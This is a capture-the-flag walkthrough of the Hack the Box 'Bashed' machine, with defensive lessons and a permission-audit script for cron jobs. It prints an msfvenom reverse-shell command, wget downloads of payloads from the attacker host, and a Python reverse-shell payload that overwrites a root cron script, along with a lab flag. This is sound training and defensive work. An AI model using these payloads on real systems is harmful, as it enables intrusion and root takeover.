
opcode

Hack the Box - Bashed

HTB, CTF (2 min read)

Summary

This was a pretty quick box, but for some reason, I always find boxes where you hijack an admin script running via root's cron fun to try. There are so many fun tricks to get a shell. A great list of reverse shells is here:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Enumeration

root@kali:/home/kali/htb/bashed# nmap -sC -sV -p- -O -oN nmap_full 10.10.10.68
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-14 00:12 EDT
Nmap scan report for 10.10.10.68
Host is up (0.055s latency).
Not shown: 65534 closed ports
PORT  STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
10.10.10.68

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.72 seconds

Port 80 - HTTP

There's a blog describing a php bash console.


It appears we're looking for a file called phpbash.php. This seems a good use case for ffuf.

root@kali:/home/kali/htb/bashed# ffuf -w /opt/wordlists/common.txt -u http://10.10.10.68/FUZZ/phpbash.php -fs 42 -c -v

        /'___\  /'___\          /'___\     
      /\ \__/ /\ \__/  __  __  /\ \__/     
      \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\     
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/     
        \ \_\  \ \_\  \ \____/  \ \_\     
          \/_/    \/_/  \/___/    \/_/     

      v1.0.2
________________________________________________

 :: Method          : GET
 :: URL              : http://10.10.10.68/FUZZ/phpbash.php
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 :: Filter          : Response size: 42
________________________________________________

[Status: 403, Size: 307, Words: 22, Lines: 12]
| URL | http://10.10.10.68/.htaccess/phpbash.php
    * FUZZ: .htaccess

[Status: 403, Size: 307, Words: 22, Lines: 12]
| URL | http://10.10.10.68/.htpasswd/phpbash.php
    * FUZZ: .htpasswd

[Status: 403, Size: 302, Words: 22, Lines: 12]
| URL | http://10.10.10.68/.hta/phpbash.php
    * FUZZ: .hta

[Status: 200, Size: 8151, Words: 3407, Lines: 216]
| URL | http://10.10.10.68/dev/phpbash.php
    * FUZZ: dev

Exploitation

Visiting http://10.10.10.68/dev/phpbash.php, I'm now the www-data user.

www-data@bashed
:/var/www/html/dev# whoami

www-data
www-data@bashed
:/var/www/html/dev# uname -a

Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@bashed
:/var/www/html/dev# cat /etc/*release*

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial


user.txt
2c281f318555dbc1b856957c7147bfc1

Privilege Escalation

Viewing all the hidden files in /home/arrexel, it seems this user has used sudo successfully.

www-data@bashed
:/home/arrexel# ls -alh

total 36K
drwxr-xr-x 4 arrexel arrexel 4.0K Dec 4 2017 .
drwxr-xr-x 4 root root 4.0K Dec 4 2017 ..
-rw------- 1 arrexel arrexel 1 Dec 23 2017 .bash_history
-rw-r--r-- 1 arrexel arrexel 220 Dec 4 2017 .bash_logout
-rw-r--r-- 1 arrexel arrexel 3.7K Dec 4 2017 .bashrc
drwx------ 2 arrexel arrexel 4.0K Dec 4 2017 .cache
drwxrwxr-x 2 arrexel arrexel 4.0K Dec 4 2017 .nano
-rw-r--r-- 1 arrexel arrexel 655 Dec 4 2017 .profile
-rw-r--r-- 1 arrexel arrexel 0 Dec 4 2017 .sudo_as_admin_successful
-r--r--r-- 1 arrexel arrexel 33 Dec 4 2017 user.txt

The passwd file contains another user called scriptmanager.

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
arrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash
scriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash

Since this is a php shell, and non-interactive, I want a more comfortable shell to work with.

root@kali:/home/kali/htb/bashed# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f elf -o shell

I stage the shell with python, and use wget to download it to /var/tmp.

www-data@bashed:/var/tmp# wget http://10.10.14.2/shell
--2020-06-13 22:07:51-- http://10.10.14.2/shell
Connecting to 10.10.14.2:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 194 [application/octet-stream]
Saving to: 'shell'

0K 100% 19.3M=0s

2020-06-13 22:07:51 (19.3 MB/s) - 'shell' saved [194/194]

There is a small problem with this webshell. It doesn't seem to parse + symbols correctly, so I use an alternate chmod command to set the binary as executable. Then, since this webshell seems like it might be running and terminating processes right away, I background the shell execution with an &.

www-data@bashed:/var/tmp# chmod +x shell

chmod: invalid mode: 'x'
Try 'chmod --help' for more information.
www-data@bashed:/var/tmp# chmod 0755 shell
www-data:/var/tmp# ./shell &

My netcat listener catches the shell, and I use python to make it a pty.

root@kali:/home/kali# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.68] 59264
python -c 'import pty; pty.spawn("/bin/sh")'
$

There is an interesting file in /scripts.

$ ls -alh /scripts
ls: cannot access '/scripts/..': Permission denied
ls: cannot access '/scripts/test.py': Permission denied
ls: cannot access '/scripts/test.txt': Permission denied
ls: cannot access '/scripts/.': Permission denied
total 0
d????????? ? ? ? ?            ? .
d????????? ? ? ? ?            ? ..
-????????? ? ? ? ?            ? test.py
-????????? ? ? ? ?            ? test.txt

I try to cat the files but get a permission denied. Enumerating further, I notice www-data can run commands as scriptmanager.

$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

I can spawn another shell as scriptmanager to try and view the files.

$ sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/var/tmp$ ls -alh /scripts
total 16K
drwxrwxr--  2 scriptmanager scriptmanager 4.0K Dec  4  2017 .
drwxr-xr-x 23 root          root          4.0K Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager  58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Jun 13 22:25 test.txt

The files are now readable. I noticed the test.txt file is owned by root. It appears root is actually the user executing the script.

scriptmanager@bashed:/var/tmp$ cat /scripts/test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/var/tmp$ cat /scripts/test.txt
cat /scripts/test.txt
testing 123!

All I need to do now is modify the script to run code for a reverse shell. I take some python from PayloadsAllTheThings and tweak it a bit.

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python

import socket,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.2",80))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")

I save this to a file on my Kali machine, then serve it up via smbserver.py and overwrite the test.py file.

scriptmanager@bashed:/scripts$ wget http://10.10.14.2/shell.py
--2020-06-13 22:57:01--  http://10.10.14.2/shell.py
Connecting to 10.10.14.2:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 190 [text/plain]
Saving to: ‘shell.py’

shell.py            100%[===================>]    190  --.-KB/s    in 0s     

2020-06-13 22:57:01 (20.9 MB/s) - ‘shell.py’ saved [190/190]

scriptmanager@bashed:/scripts$ mv shell.py test.py

I open a netcat listener, and in a few seconds, the reverse shell connects.


Defensive Lessons Learned

Security through obscurity gets a bad rap, and on its own it isn't enough, especially when you're sharing a web shell publicly.

The web shell gave me a low-privilege shell and a chance to escalate privileges. There should be authentication in front of any type of shell or remote terminal.

Then, an admin script was running as root, but a low-privilege user was allowed to edit the script via sudo privileges.

Ideally, any service accounts such as www-data should have privileges confined to just the files and services they need to access, and sudo permissions should be restricted. Theoretically, a web service user shouldn't even need write permissions to most things unless the web app is saving files.
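The root-cron hijack above worked because /scripts was owned and group-writable by scriptmanager, so test.py could simply be renamed over. As an added example (not code from the box or the writeup), this audit checks a script that root runs from cron, plus its parent directory, for exactly those ownership and write-bit weaknesses; the demo rebuilds the box's /scripts permissions in a temp directory rather than touching the real system.

```python
"""Audit a cron-run script for hijack risk: the file and the directory that
holds it must both be root-owned and not writable by group or others."""
import os
import shutil
import stat
import tempfile

WRITE_BITS = stat.S_IWGRP | stat.S_IWOTH


def weaknesses(uid, mode):
    """Reasons a non-root user could replace or edit an object, from stat data.

    Pure function so it can be checked without real files: uid is st_uid,
    mode is st_mode (type bits included)."""
    reasons = []
    if uid != 0:
        reasons.append(f"owned by uid {uid}, not root")
    if mode & WRITE_BITS:
        reasons.append("group/world writable")
    if stat.S_ISLNK(mode):
        reasons.append("symlink; target can be swapped")
    return reasons


def audit_cron_script(path):
    """Findings for a script executed by root's cron: checks the script itself
    and its parent directory, because a writable directory lets any user
    rename their own file over the script (the mv used on Bashed)."""
    findings = []
    st = os.lstat(path)
    findings += [f"{path}: {r}" for r in weaknesses(st.st_uid, st.st_mode)]
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.lstat(parent)
    findings += [f"{parent}: {r}" for r in weaknesses(pst.st_uid, pst.st_mode)]
    return findings


def demo():
    """Constructed layout mirroring the box: drwxrwxr-- scripts/, -rw-r--r-- test.py."""
    root = tempfile.mkdtemp()
    try:
        scripts = os.path.join(root, "scripts")
        os.mkdir(scripts)
        script = os.path.join(scripts, "test.py")
        with open(script, "w") as f:
            f.write('f = open("test.txt", "w")\nf.write("testing 123!")\nf.close()\n')
        os.chmod(script, 0o644)
        os.chmod(scripts, 0o774)  # group-writable directory, as on Bashed
        return audit_cron_script(script)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Run as root against the real /scripts and crontab targets, the same `audit_cron_script` call flags the directory (and, on the box, the scriptmanager-owned script) as writable by an unprivileged user.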

Offensive Lessons Learned

Always check sudo -l, and keep your eyes open for any lazy admin scripts that might be available to hijack.